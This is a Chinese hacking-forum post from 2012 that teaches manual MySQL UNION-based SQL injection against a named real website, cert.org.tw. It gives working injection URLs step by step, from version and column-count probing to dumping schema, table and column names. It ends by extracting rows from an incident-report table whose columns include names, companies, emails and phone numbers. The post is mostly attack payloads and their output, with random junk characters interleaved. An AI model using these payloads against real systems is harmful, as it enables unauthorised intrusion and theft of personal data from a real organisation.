找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1695|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询  W6 X( R4 z8 e; Z% i% H
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
, _/ m$ U2 D  v- a- N# _http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--! F8 F4 e+ q! k" B/ w" k1 q5 Q, [
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
3 y$ ]' Z3 U5 x* w, m# b数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。6 p" ?% m8 z6 @6 F- e/ B3 g
4.判断有没有写权限8 w7 ~/ M; S/ m' g
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限1 h2 p  |; D( H) p/ T: j$ p" P: P
没办法,手动猜表啦  }5 u% w9 A' H; Y; V4 n
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,11 i' [; n- i: j6 }8 j8 v' v) S
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下" I# I( W7 c* q$ f2 ^, o
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--' b. z" U3 x! s- t* @) C4 c+ j
成功查出所有数据库,国外的黑客就是不一般。数据库如下:4 b, {: `/ E  C# y  T4 U: f- v0 Z
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
' U: |' p& |. G1 o& |6.爆表,爆的是twcert库
& B/ Z) p6 f! a" {) D: Lhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
8 `2 Y9 z: y# B爆出如下表
+ H" q6 t# H6 Z' n9 gdownloadfile,irsys,newsdata,secrpt,secrpt_big5
5 b% k% Y3 e+ {- T7 z) P' n7.爆列名,这次爆的是irsys表
; q% A3 |% ?5 Dhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
9 y8 D0 F( Z/ M/ m! P, Q; ~4 X爆出如下列
6 I! v, j, Q6 R7 ?ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
8 X+ ~0 a. Q& Z4 C. T5 S7 _1 G8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。+ d8 n% ^0 f0 q) p7 B6 E6 i
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--9 s5 ^! U! B0 o! ~! l) `
返回是3,说明每个列里有3个地段
) g; h9 J  s+ R# g7 m# [9.爆字段内容" B4 @. y# u) G1 `. M
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--  }- V" K: N6 _# l- V9 J8 P
爆出name列的第一个字段的内容' ?+ F0 e$ Z' O5 Q. i% K$ U& f- c
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--7 [+ X8 n7 P8 `
爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表